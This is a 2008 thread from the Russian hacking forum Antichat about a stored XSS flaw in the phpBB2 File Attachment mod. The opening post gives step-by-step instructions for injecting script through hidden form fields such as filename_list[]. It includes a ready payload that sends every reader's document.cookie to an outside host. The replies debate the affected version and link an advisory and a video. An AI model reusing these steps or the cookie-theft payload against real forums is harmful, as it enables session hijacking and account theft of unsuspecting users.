ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

!!! phpBB2 mod File Attachment Mode новая активная XSS !!!
  #1  
Старый 16.04.2008, 22:05
Аватар для KIR@PRO
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
Exclamation !!! phpBB2 mod File Attachment Mode новая активная XSS !!!

Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5

привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 ))))

исходя из сообщения Basurman :

Цитата:
Сообщение от Basurman  
2.0.21 или 2.0.22?Как отличить последнюю версию второй ветки (2.0.22) от остальных? (пост восстановлен)
Очень просто. До последней версии был баг (не инъект!) в лимите во всех скритах, где присутствовал постраничный вывод на экран.
Например, в скрипте viewforum.php, который и рассмотрим.
Определить можно, добавив параметр start=-1 в адресной строке, например, к viewforum.php
То есть, если есть ccылка вида:
http://forum/viewforum.php?f=32
Набираем:
http://forum/viewforum.php?f=32&start=-1
Если вываливается с ошибкой - версия <=2.0.21
Если нет - 2.0.22
Код:
Could not obtain topic information DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 12 SELECT t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time FROM topics t, users u, posts p, posts p2, users u2 WHERE t.forum_id = 50 AND t.topic_poster = u.user_id AND p.post_id = t.topic_first_post_id AND p2.post_id = t.topic_last_post_id AND u2.user_id = p2.poster_id AND t.topic_type <> 2 AND t.topic_type <> 3 ORDER BY t.topic_type DESC, t.topic_last_post_id DESC LIMIT -1, 20 Line : 420 File : /xxx/phpbb/viewforum.php
P.S. Все файлы, где есть параметр start можно найти в апдейтере 2.0.22
P.S.S На forums.overclockers.ru стоит не 2.0.22 (ну или сильно криворукий обновляльщик)
рассмотренная мной версия >= 2.0.22

уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже))

Уязвимые поля:
  1. attachment_list[]
  2. filename_list[]
  3. filesize_list[]
  4. filetime_list[]
  5. attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал)

суть уязвимости:
при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения
не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором
отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр
type у указанных выше полей на text, и изменяем и изменяем action формы на полный
путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере.
видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в
зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie )

все тоже самое с перечисленными выше скриптами...

на 3-й ветке пробовал там уже нету.....

Video: http://xakep-ru.pochta.ru/phpBB_xss_by_KIR_PRO.rar1644 Кб +

если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему


___________________________________


не могу найти где подпись делать.... может я ударился головой? напишите если кто знает как подпись делать...

Последний раз редактировалось KIR@PRO; 16.06.2008 в 20:28..
 
Ответить с цитированием

  #2  
Старый 16.04.2008, 22:15
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

Ммм... Ты думаешь, жертва сама сохранит страницу и исправит сурс, потом зайдет обратно на форум, чтобы сама себе alert'ы писать типа "ПРЕВЕД"?
 
Ответить с цитированием

  #3  
Старый 16.04.2008, 22:21
Аватар для KIR@PRO
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию

Basurman яж написал АКТИВНАЯ XSS жертве ниче делать не надо....

ты редактируешь страницу... вписываешь в скрытые поля xss и отправляешь... у всех кто читает тему будет выполнятся код....

Последний раз редактировалось KIR@PRO; 16.04.2008 в 22:43..
 
Ответить с цитированием

  #4  
Старый 16.04.2008, 22:57
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

Это вопрос был

И еще:
В phpBB по умолчанию кидать на форум файлы нельзя. Это делается отдельным модом.
Судя по видео - File Attachment Mode... Какая там версия стоит? Последняя 2.4.5

Последний раз редактировалось Basurman; 16.04.2008 в 23:03..
 
Ответить с цитированием

  #5  
Старый 16.04.2008, 23:05
Аватар для KIR@PRO
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию

Basurman честно скажу не знаю.... админы постарались как можно сильнее всю инфу о версиях спрятать...

а ты умерен что это мод File Attachment Mode и что это вообще мод я просто с phpBB вообще впервые столкнулся подруку попался.... у нас в локалке такой на сервере стоит.... и оказалось что у одного из модеров пароль такойже как ник)))))
 
Ответить с цитированием

  #6  
Старый 16.04.2008, 23:10
Аватар для hackconnect
hackconnect
Познающий
Регистрация: 08.03.2007
Сообщений: 65
Провел на форуме:
91259

Репутация: 16
Отправить сообщение для hackconnect с помощью ICQ
По умолчанию

Цитата:
DEBUG MODE
ни о чем не говорит?

Последний раз редактировалось hackconnect; 16.04.2008 в 23:24..
 
Ответить с цитированием

  #7  
Старый 16.04.2008, 23:10
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

на 2.4.5 не пашет
код посмотрю еще...

http://www.securitylab.ru/vulnerability/273545.php

Последний раз редактировалось Basurman; 16.04.2008 в 23:17..
 
Ответить с цитированием

  #8  
Старый 17.04.2008, 00:27
Аватар для KIR@PRO
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389

Репутация: 332
Отправить сообщение для KIR@PRO с помощью ICQ
По умолчанию

тогда будем считать что я нашел как юзать указанную в http://www.securitylab.ru/vulnerability/273545.php уязвимость )))))))) т.к. там не указано в каких параметрах и как юзать))))



bobob а ты к примеру знал как её юзать??? тока честно..... я вот ни где не нашел....
 
Ответить с цитированием

  #9  
Старый 22.04.2008, 14:48
Аватар для ShadOS
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Видео к уязвимости: http://video.antichat.ru/file264.html
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #10  
Старый 22.04.2008, 15:06
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

ShadOS, http://www.securitylab.ru/vulnerability/273545.php
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Активная XSS на mail.ru Dronga E-Mail 69 05.04.2008 01:56
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Форумы 6 26.10.2006 21:30
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ